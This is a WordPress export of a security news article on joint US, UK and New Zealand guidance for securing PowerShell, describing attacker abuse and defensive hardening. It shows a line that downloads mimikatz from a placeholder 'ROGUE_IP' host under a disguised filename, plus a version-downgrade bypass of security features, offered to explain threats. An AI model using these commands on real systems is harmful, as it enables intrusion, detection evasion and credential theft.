{"id":22409,"date":"2022-06-24T16:44:06","date_gmt":"2022-06-24T16:44:06","guid":{"rendered":"https:\/\/www.esecurityplanet.com\/?p=22409"},"modified":"2022-06-24T16:44:08","modified_gmt":"2022-06-24T16:44:08","slug":"powershell-security","status":"publish","type":"post","link":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/","title":{"rendered":"Cybersecurity Agencies Release Guidance for PowerShell Security"},"content":{"rendered":"\n<p>PowerShell is one of the <a href=\"https:\/\/www.esecurityplanet.com\/threats\/powershell-source-of-third-of-critical-security-threats\/\">most common tools<\/a> used by hackers in &#8220;living off the land&#8221; attacks, when malicious actors use an organization&#8217;s own tools against itself.<\/p>\n\n\n\n<p>This week, U.S. cybersecurity agencies joined their counterparts in the UK and New Zealand to offer guidance so organizations can use PowerShell safely.<\/p>\n\n\n\n<p>PowerShell is a command line tool and associated scripting language built on the .NET framework. Originally built for Windows, Microsoft <a href=\"https:\/\/github.com\/PowerShell\/PowerShell\" target=\"_blank\" rel=\"noreferrer noopener\">open sourced<\/a> it in 2016. While most administrators use it to patch systems and execute scripts, PowerShell is also a classic tool in the hackers\u2019 arsenal, so defenders and <a href=\"https:\/\/www.esecurityplanet.com\/networks\/penetration-testing\/\">pentesters<\/a> need to master it.<\/p>\n\n\n\n<p>The U.S. Cybersecurity and Infrastructure Security Agency (CISA) <a href=\"https:\/\/www.cisa.gov\/uscert\/ncas\/current-activity\/2022\/06\/22\/keeping-powershell-measures-use-and-embrace\" target=\"_blank\" rel=\"noreferrer noopener\">announced<\/a> a joint Cybersecurity Information Sheet (CIS) between cybersecurity authorities from the U.S., New Zealand and the UK on PowerShell in the hope of helping defenders detect PowerShell abuses while enabling legitimate uses.<\/p>\n\n\n\n<p>CISA, the NSA and their UK and New Zealand counterparts are urging users and administrators to review the guidance, <a href=\"https:\/\/media.defense.gov\/2022\/Jun\/22\/2003021689\/-1\/-1\/1\/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF\" target=\"_blank\" rel=\"noreferrer noopener\">Keeping PowerShell: Measures to Use and Embrace<\/a>, an 8-page PDF document that lists concrete actions to mitigate attacks.<\/p>\n\n\n\n<p>See the <a href=\"https:\/\/www.esecurityplanet.com\/products\/active-directory-security-tools\/\">Top Active Directory Security Tools<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>How Attackers Use PowerShell<\/strong><\/h2>\n\n\n\n<p>Tactics vary, but hackers usually gain initial access (such as after a <a href=\"https:\/\/www.esecurityplanet.com\/threats\/phishing-attacks\/\">phishing attack<\/a>) and then use PowerShell to target Active Directory (AD) or other critical systems.<\/p>\n\n\n\n<p>If admins do not restrict AD attributes, methods and capabilities, hackers might steal credentials or elevate privileges to exfiltrate data or install <a href=\"https:\/\/www.esecurityplanet.com\/threats\/malware-types\/\">malware<\/a>. On the other hand, if PowerShell is too limited or disabled, admins won\u2019t be able to \u201cassist with system maintenance, forensics, automation, and security,\u201d according to the guidance document.<\/p>\n\n\n\n<p>Pentesters can attempt various attacks using PowerShell, as the console accepts pretty much everything that works with cmd.exe, including old scripts and .bat files, but a common approach is to download resources from an external IP:<\/p>\n\n\n\n<p><em>Invoke-WebRequest &#8220;http:\/\/ROGUE_IP:80\/mimikatz.exe&#8221; -OutFile &#8220;legitimateexec.exe&#8221;<\/em><\/p>\n\n\n\n<p>Note: in the above command, \u201cmimikatz.exe\u201d does not become legitimate once written onto the system but is simply renamed to evade basic detection (which is unfortunately often enough).<\/p>\n\n\n\n<p>It\u2019s a very basic example but, in real-world conditions, hackers can hide malicious code using base64 or more sophisticated obfuscation.<\/p>\n\n\n\n<p>Of course, it\u2019s not the only attack possible. You can enumerate scheduled tasks, list members and administrators, get environment variables, read history, bypass policies, disable monitoring, inject malicious code in memory, and achieve more complex tasks.<\/p>\n\n\n\n<p>Also read: <a href=\"https:\/\/www.esecurityplanet.com\/threats\/how-hackers-evade-detection\/\">How Hackers Evade Detection<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>How Users and Admins Can Secure PowerShell<\/strong><\/h2>\n\n\n\n<p>Some PowerShell attacks are pretty hard to detect. Defenders can use <a href=\"https:\/\/www.esecurityplanet.com\/products\/edr-solutions\/\">EDR tools<\/a> or other security products to mitigate them.<\/p>\n\n\n\n<p>Those PowerShell attacks are attractive for hackers because they can quickly elevate privileges in permissive environments. In other words, it\u2019s a legitimate tool that can give access to both local and remote systems across the network.<\/p>\n\n\n\n<p>Users and admins can strengthen their systems significantly by rejecting unsigned scripts and restricting script execution.<\/p>\n\n\n\n<p>According to the document, they should also disable and uninstall deprecated versions of PowerShell to reduce most abuses by attackers. Besides, recent versions have enhanced built-in security features for prevention, detection, and authentication capabilities, such as PowerShell&#8217;s credential protection features.<\/p>\n\n\n\n<p>Logging PowerShell activities is also recommended. For example, the Deep Script Block Logging (DSBL) module can allow you to record suspicious Invoke commands used by hackers during their attacks.<\/p>\n\n\n\n<p>If you need to run tasks remotely, use SSH, as it\u2019s secure by design, unlike some protocols.<\/p>\n\n\n\n<p>The screenshot below lists features included in recent versions of PowerShell that security teams and defenders can use:<br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/sKFMutWXePM7PJBHxLXQX--ipKjZtgvyOeUWmhQL42sIKQvR-6lGWC7UlTkp_0m9rls6cA2Z-EO4sR7qkIP9gPIw3tzondPpdfhiZqlCha0erQPB0sEkp8W0bqMIuFWwQu2XVBcZb4RpjVHcfw\" width=\"634\" height=\"286\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Be Aware of Common Bypass Techniques<\/strong><\/h2>\n\n\n\n<p>You can read the PowerShell execution policy by typing:<\/p>\n\n\n\n<p><em>Get-ExecutionPolicy<\/em><\/p>\n\n\n\n<p>It\u2019s meant to restrict what can run and what cannot, which is especially recommended to block scripts downloaded from the Internet, but there are known techniques to bypass restrictions, modify the execution policy to elevate privileges, and even disable it if needed.<\/p>\n\n\n\n<p>You can use a command like the following to modify the policy:<\/p>\n\n\n\n<p><em>Set-ExecutionPolicy $Policy -Force<\/em><\/p>\n\n\n\n<p>The problem is the above command can be executed by a legitimate user to complete administrative tasks, so you can\u2019t disable it without inconvenience. Not all users should be allowed to run it, for obvious reasons. <a href=\"https:\/\/www.esecurityplanet.com\/products\/best-user-and-entity-behavior-analytics-ueba-tools\/\">Behavioral analysis<\/a> might help spot such unusual activities in user accounts.<\/p>\n\n\n\n<p>Also, don\u2019t use PowerShell security features blindly. For example, AMSI (Anti-Malware Scan Interface) is a PowerShell security feature that allows integration into anti-malware products, but it\u2019s instrumented by a dll (amsi.dll) that can be abused.<\/p>\n\n\n\n<p>Besides, attackers have learned how security features work and how to evade them. The PowerShell downgrade attack is a common bypass that is used to remove security features:<\/p>\n\n\n\n<p><em>PowerShell -Version 2<\/em><\/p>\n\n\n\n<p>Hackers can even use an automated tool such as <a href=\"https:\/\/github.com\/trustedsec\/unicorn\" target=\"_blank\" rel=\"noreferrer noopener\">Unicorn<\/a> to perform these attacks.<\/p>\n\n\n\n<p>Also read: <a href=\"https:\/\/www.esecurityplanet.com\/threats\/a-few-clicks-from-data-disaster-enterprise-security\/\">A Few Clicks from Data Disaster: The State of Enterprise Security<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>No Foolproof Solution<\/strong><\/h2>\n\n\n\n<p>As usual, there\u2019s no magic solution. Using the latest versions of PowerShell and restricting the execution policy won\u2019t block the most sophisticated attacks that can divert native functionalities and remain undetected.<\/p>\n\n\n\n<p>However, that&#8217;s still a significant step towards better security, as lots of corporate networks neglect post-exploitation, making AD enumeration and other abuses relatively easy for hackers. Defense in layers is efficient and there\u2019s no valid reason not to harden your configurations.<\/p>\n\n\n\n<p>Read next: <a href=\"https:\/\/www.esecurityplanet.com\/products\/rapid7-insightidr-review\/\">Testing &amp; Evaluating SIEM Systems: A Review of Rapid7 InsightIDR<\/a><\/p>\n\n\n<div id=\"ta-campaign-widget-66d6f0fa0a052-popup-wrapper\" class=\"ta-campaign-widget__popup-wrapper\">\n    \n<div\n    style=\"\n        --ta-campaign-plugin-primary: #3545ed;\n        --ta-campaign-plugin-button-text: #fff;\n        --ta-campaign-plugin-button-hover-background: #3231b4;\n        --ta-campaign-plugin-button-hover-text: #fff;\n        --ta-campaign-plugin-button-toggle-background: #3231b4;\n        --ta-campaign-plugin-button-toggle-text: #3231B4;\n    \"\n    data-ajax-url=\"https:\/\/www.esecurityplanet.com\/wp\/wp-admin\/admin-ajax.php\">\n    <div\n        id=\"ta-campaign-widget-66d6f0fa0a052\"\n        class=\"ta-campaign-widget ta-campaign-widget--popup\"\n        data-campaign-fields='{\"properties\":{\"campaign_type\":\"popup\",\"campaign_category\":false,\"sailthru_list\":[\"cybersecurity-insider\"],\"popup_type\":\"exit_intent\",\"appearance\":{\"colors\":{\"primary_color\":\"#3545ed\",\"button\":{\"button_text_color\":\"#fff\",\"hover\":{\"button_hover_background_color\":\"#3231b4\",\"button_hover_text_color\":\"#fff\"},\"toggle\":{\"button_toggle_background_color\":\"#3231b4\",\"button_toggle_text_color\":\"#3231B4\"}}},\"custom_scss\":\"\"},\"behavior\":{\"opt_in_enabled\":true},\"language\":{\"tagline\":\"Get the Free Cybersecurity Newsletter\",\"subtagline\":\"\",\"content\":\"Strengthen your organization&#39;s IT security defenses by keeping up to date on the latest cybersecurity news, solutions, and best practices. Delivered every Monday, Tuesday and Thursday\",\"email_placeholder\":\"Work Email Address\",\"opt_in\":\"By signing up to receive our newsletter, you agree to our Terms of Use and Privacy Policy. You can unsubscribe at any time.\",\"subscribe_button\":\"Subscribe\"}},\"identifier\":\"66d6f0fa0a052\",\"campaign_id\":26045,\"campaign_type\":\"popup\",\"popup_type\":\"exit_intent\",\"newsletters\":[\"cybersecurity-insider\"],\"behavior\":{\"opt_in_enabled\":true},\"appearance\":{\"colors\":{\"primary\":\"#3545ed\",\"button\":{\"text\":\"#fff\",\"hover\":{\"background\":\"#3231b4\",\"text\":\"#fff\"},\"toggle\":{\"background\":\"#3231b4\",\"text\":\"#3231B4\"}}},\"custom_css\":\"\"},\"language\":{\"tagline\":\"Get the Free Cybersecurity Newsletter\",\"subtagline\":\"\",\"content\":\"Strengthen your organization&#39;s IT security defenses by keeping up to date on the latest cybersecurity news, solutions, and best practices. Delivered every Monday, Tuesday and Thursday\",\"email_placeholder\":\"Work Email Address\",\"opt_in\":\"By signing up to receive our newsletter, you agree to our Terms of Use and Privacy Policy. You can unsubscribe at any time.\",\"subscribe_button\":\"Subscribe\"}}'>\n\n                <div class=\"ta-campaign-widget__exit\">\n            <svg class=\"w-8\" fill=\"none\" stroke=\"currentColor\" stroke-width=\"1.5\" viewBox=\"0 0 24 24\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" aria-hidden=\"true\">\n                <path stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M6 18L18 6M6 6l12 12\"><\/path>\n            <\/svg>\n        <\/div>\n        \n        <div class=\"ta-campaign-widget__wrapper\">\n            <div class=\"ta-campaign-widget__header mb-6\">\n                                <h3 class=\"ta-campaign-widget__tagline\">\n                    Get the Free Cybersecurity Newsletter                <\/h3>\n                \n                \n                                <p class=\"ta-campaign-widget__content mt-6\">\n                    Strengthen your organization's IT security defenses by keeping up to date on the latest cybersecurity news, solutions, and best practices. Delivered every Monday, Tuesday and Thursday                <\/p>\n                            <\/div>\n\n            <form class=\"ta-campaign-widget__form\">\n                <div class=\"ta-campaign-widget__input mb-4\"  data-field=\"email\">\n                    <label\n                        class=\"sr-only\"\n                        for=\"email-66d6f0fa0a052\">\n                        Email Address\n                    <\/label>\n                    <input\n                        class=\"ta-campaign-widget__input__text\"\n                        placeholder=\"Work Email Address\"\n                        id=\"email-66d6f0fa0a052\"\n                        name=\"email\"\n                        type=\"email\">\n                <\/div>\n\n                                <div class=\"ta-campaign-widget__checkbox mb-4\" data-field=\"opt_in\">\n                    <div class=\"flex items-start\">\n                        <input\n                            id=\"opt-in-66d6f0fa0a052\"\n                            class=\"ta-campaign-widget__checkbox__input mr-2\"\n                            name=\"opt-in\"\n                            type=\"checkbox\"\/>\n                        <label\n                            class=\"ta-campaign-widget__checkbox__label\"\n                            for=\"opt-in-66d6f0fa0a052\">\n                            By signing up to receive our newsletter, you agree to our Terms of Use and Privacy Policy. You can unsubscribe at any time.                        <\/label>\n                    <\/div>\n                <\/div>\n                \n                <button class=\"ta-campaign-widget__button\" type=\"submit\" >\n                    Subscribe                <\/button>\n            <\/form>\n        <\/div>\n    <\/div>\n<\/div>\n\n<style>\n<\/style><\/div>\n","protected":false},"excerpt":{"rendered":"<p>PowerShell is one of the most common tools used by hackers in &#8220;living off the land&#8221; attacks, when malicious actors use an organization&#8217;s own tools against itself. This week, U.S. cybersecurity agencies joined their counterparts in the UK and New Zealand to offer guidance so organizations can use PowerShell safely. PowerShell is a command line [&hellip;]<\/p>\n","protected":false},"author":267,"featured_media":22282,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_gazelle_contributing_experts":"","footnotes":""},"categories":[22,15],"tags":[5735,2369,532,3414,730],"b2b_audience":[33,35],"b2b_industry":[],"b2b_product":[382,404,409],"class_list":["post-22409","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-applications","category-threats","tag-application-security-2","tag-cloud-security","tag-microsoft","tag-network-security","tag-security","b2b_audience-awareness-and-consideration","b2b_audience-implementation-and-support","b2b_product-application-security-vulnerability-management","b2b_product-hackers","b2b_product-server-software"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Cybersecurity Agencies Release Guidance for PowerShell Security | eSecurity Planet<\/title>\n<meta name=\"description\" content=\"PowerShell is a critical tool for IT admins, but it&#039;s also widely exploited by hackers. Here&#039;s how to secure PowerShell.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cybersecurity Agencies Release Guidance for PowerShell Security | eSecurity Planet\" \/>\n<meta property=\"og:description\" content=\"PowerShell is a critical tool for IT admins, but it&#039;s also widely exploited by hackers. Here&#039;s how to secure PowerShell.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/\" \/>\n<meta property=\"og:site_name\" content=\"eSecurity Planet\" \/>\n<meta property=\"article:published_time\" content=\"2022-06-24T16:44:06+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-06-24T16:44:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/assets.esecurityplanet.com\/uploads\/2022\/06\/cybersecurity-broken-link.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"618\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Julien Maury\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@eSecurityPlanet\" \/>\n<meta name=\"twitter:site\" content=\"@eSecurityPlanet\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Julien Maury\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/\"},\"author\":{\"name\":\"Julien Maury\",\"@id\":\"https:\/\/www.esecurityplanet.com\/#\/schema\/person\/4723f5dca54d7ee1d8111912ac8b1d4a\"},\"headline\":\"Cybersecurity Agencies Release Guidance for PowerShell Security\",\"datePublished\":\"2022-06-24T16:44:06+00:00\",\"dateModified\":\"2022-06-24T16:44:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/\"},\"wordCount\":916,\"publisher\":{\"@id\":\"https:\/\/www.esecurityplanet.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/assets.esecurityplanet.com\/uploads\/2022\/06\/cybersecurity-broken-link.jpg\",\"keywords\":[\"application security\",\"cloud security\",\"Microsoft\",\"network security\",\"security\"],\"articleSection\":[\"Applications\",\"Threats\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/\",\"url\":\"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/\",\"name\":\"Cybersecurity Agencies Release Guidance for PowerShell Security | eSecurity Planet\",\"isPartOf\":{\"@id\":\"https:\/\/www.esecurityplanet.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/assets.esecurityplanet.com\/uploads\/2022\/06\/cybersecurity-broken-link.jpg\",\"datePublished\":\"2022-06-24T16:44:06+00:00\",\"dateModified\":\"2022-06-24T16:44:08+00:00\",\"description\":\"PowerShell is a critical tool for IT admins, but it's also widely exploited by hackers. Here's how to secure PowerShell.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/#primaryimage\",\"url\":\"https:\/\/assets.esecurityplanet.com\/uploads\/2022\/06\/cybersecurity-broken-link.jpg\",\"contentUrl\":\"https:\/\/assets.esecurityplanet.com\/uploads\/2022\/06\/cybersecurity-broken-link.jpg\",\"width\":800,\"height\":618,\"caption\":\"cybersecurity\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.esecurityplanet.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cybersecurity Agencies Release Guidance for PowerShell Security\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.esecurityplanet.com\/#website\",\"url\":\"https:\/\/www.esecurityplanet.com\/\",\"name\":\"eSecurity Planet\",\"description\":\"Industry-leading guidance and analysis for how to keep your business secure.\",\"publisher\":{\"@id\":\"https:\/\/www.esecurityplanet.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.esecurityplanet.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.esecurityplanet.com\/#organization\",\"name\":\"eSecurityPlanet\",\"url\":\"https:\/\/www.esecurityplanet.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.esecurityplanet.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/assets.esecurityplanet.com\/uploads\/2020\/10\/eSecurity_logo_MainLogo.png\",\"contentUrl\":\"https:\/\/assets.esecurityplanet.com\/uploads\/2020\/10\/eSecurity_logo_MainLogo.png\",\"width\":1134,\"height\":375,\"caption\":\"eSecurityPlanet\"},\"image\":{\"@id\":\"https:\/\/www.esecurityplanet.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/eSecurityPlanet\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.esecurityplanet.com\/#\/schema\/person\/4723f5dca54d7ee1d8111912ac8b1d4a\",\"name\":\"Julien Maury\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.esecurityplanet.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/assets.esecurityplanet.com\/uploads\/2023\/02\/JulienMaury-AvatarImg-150x150.webp\",\"contentUrl\":\"https:\/\/assets.esecurityplanet.com\/uploads\/2023\/02\/JulienMaury-AvatarImg-150x150.webp\",\"caption\":\"Julien Maury\"},\"description\":\"eSecurity Planet contributor Julien Maury writes about penetration testing, code security, open source security and more. He is a backend developer, a mentor and a technical writer who enjoys sharing his knowledge and learning new concepts.\",\"url\":\"https:\/\/www.esecurityplanet.com\/author\/jmaury\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cybersecurity Agencies Release Guidance for PowerShell Security | eSecurity Planet","description":"PowerShell is a critical tool for IT admins, but it's also widely exploited by hackers. Here's how to secure PowerShell.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/","og_locale":"en_US","og_type":"article","og_title":"Cybersecurity Agencies Release Guidance for PowerShell Security | eSecurity Planet","og_description":"PowerShell is a critical tool for IT admins, but it's also widely exploited by hackers. Here's how to secure PowerShell.","og_url":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/","og_site_name":"eSecurity Planet","article_published_time":"2022-06-24T16:44:06+00:00","article_modified_time":"2022-06-24T16:44:08+00:00","og_image":[{"width":800,"height":618,"url":"https:\/\/assets.esecurityplanet.com\/uploads\/2022\/06\/cybersecurity-broken-link.jpg","type":"image\/jpeg"}],"author":"Julien Maury","twitter_card":"summary_large_image","twitter_creator":"@eSecurityPlanet","twitter_site":"@eSecurityPlanet","twitter_misc":{"Written by":"Julien Maury","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/#article","isPartOf":{"@id":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/"},"author":{"name":"Julien Maury","@id":"https:\/\/www.esecurityplanet.com\/#\/schema\/person\/4723f5dca54d7ee1d8111912ac8b1d4a"},"headline":"Cybersecurity Agencies Release Guidance for PowerShell Security","datePublished":"2022-06-24T16:44:06+00:00","dateModified":"2022-06-24T16:44:08+00:00","mainEntityOfPage":{"@id":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/"},"wordCount":916,"publisher":{"@id":"https:\/\/www.esecurityplanet.com\/#organization"},"image":{"@id":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/#primaryimage"},"thumbnailUrl":"https:\/\/assets.esecurityplanet.com\/uploads\/2022\/06\/cybersecurity-broken-link.jpg","keywords":["application security","cloud security","Microsoft","network security","security"],"articleSection":["Applications","Threats"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/","url":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/","name":"Cybersecurity Agencies Release Guidance for PowerShell Security | eSecurity Planet","isPartOf":{"@id":"https:\/\/www.esecurityplanet.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/#primaryimage"},"image":{"@id":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/#primaryimage"},"thumbnailUrl":"https:\/\/assets.esecurityplanet.com\/uploads\/2022\/06\/cybersecurity-broken-link.jpg","datePublished":"2022-06-24T16:44:06+00:00","dateModified":"2022-06-24T16:44:08+00:00","description":"PowerShell is a critical tool for IT admins, but it's also widely exploited by hackers. Here's how to secure PowerShell.","breadcrumb":{"@id":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/#primaryimage","url":"https:\/\/assets.esecurityplanet.com\/uploads\/2022\/06\/cybersecurity-broken-link.jpg","contentUrl":"https:\/\/assets.esecurityplanet.com\/uploads\/2022\/06\/cybersecurity-broken-link.jpg","width":800,"height":618,"caption":"cybersecurity"},{"@type":"BreadcrumbList","@id":"https:\/\/www.esecurityplanet.com\/threats\/powershell-security\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.esecurityplanet.com\/"},{"@type":"ListItem","position":2,"name":"Cybersecurity Agencies Release Guidance for PowerShell Security"}]},{"@type":"WebSite","@id":"https:\/\/www.esecurityplanet.com\/#website","url":"https:\/\/www.esecurityplanet.com\/","name":"eSecurity Planet","description":"Industry-leading guidance and analysis for how to keep your business secure.","publisher":{"@id":"https:\/\/www.esecurityplanet.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.esecurityplanet.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.esecurityplanet.com\/#organization","name":"eSecurityPlanet","url":"https:\/\/www.esecurityplanet.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.esecurityplanet.com\/#\/schema\/logo\/image\/","url":"https:\/\/assets.esecurityplanet.com\/uploads\/2020\/10\/eSecurity_logo_MainLogo.png","contentUrl":"https:\/\/assets.esecurityplanet.com\/uploads\/2020\/10\/eSecurity_logo_MainLogo.png","width":1134,"height":375,"caption":"eSecurityPlanet"},"image":{"@id":"https:\/\/www.esecurityplanet.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/eSecurityPlanet"]},{"@type":"Person","@id":"https:\/\/www.esecurityplanet.com\/#\/schema\/person\/4723f5dca54d7ee1d8111912ac8b1d4a","name":"Julien Maury","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.esecurityplanet.com\/#\/schema\/person\/image\/","url":"https:\/\/assets.esecurityplanet.com\/uploads\/2023\/02\/JulienMaury-AvatarImg-150x150.webp","contentUrl":"https:\/\/assets.esecurityplanet.com\/uploads\/2023\/02\/JulienMaury-AvatarImg-150x150.webp","caption":"Julien Maury"},"description":"eSecurity Planet contributor Julien Maury writes about penetration testing, code security, open source security and more. He is a backend developer, a mentor and a technical writer who enjoys sharing his knowledge and learning new concepts.","url":"https:\/\/www.esecurityplanet.com\/author\/jmaury\/"}]}},"_links":{"self":[{"href":"https:\/\/www.esecurityplanet.com\/wp-json\/wp\/v2\/posts\/22409"}],"collection":[{"href":"https:\/\/www.esecurityplanet.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.esecurityplanet.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.esecurityplanet.com\/wp-json\/wp\/v2\/users\/267"}],"replies":[{"embeddable":true,"href":"https:\/\/www.esecurityplanet.com\/wp-json\/wp\/v2\/comments?post=22409"}],"version-history":[{"count":0,"href":"https:\/\/www.esecurityplanet.com\/wp-json\/wp\/v2\/posts\/22409\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.esecurityplanet.com\/wp-json\/wp\/v2\/media\/22282"}],"wp:attachment":[{"href":"https:\/\/www.esecurityplanet.com\/wp-json\/wp\/v2\/media?parent=22409"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.esecurityplanet.com\/wp-json\/wp\/v2\/categories?post=22409"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.esecurityplanet.com\/wp-json\/wp\/v2\/tags?post=22409"},{"taxonomy":"b2b_audience","embeddable":true,"href":"https:\/\/www.esecurityplanet.com\/wp-json\/wp\/v2\/b2b_audience?post=22409"},{"taxonomy":"b2b_industry","embeddable":true,"href":"https:\/\/www.esecurityplanet.com\/wp-json\/wp\/v2\/b2b_industry?post=22409"},{"taxonomy":"b2b_product","embeddable":true,"href":"https:\/\/www.esecurityplanet.com\/wp-json\/wp\/v2\/b2b_product?post=22409"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}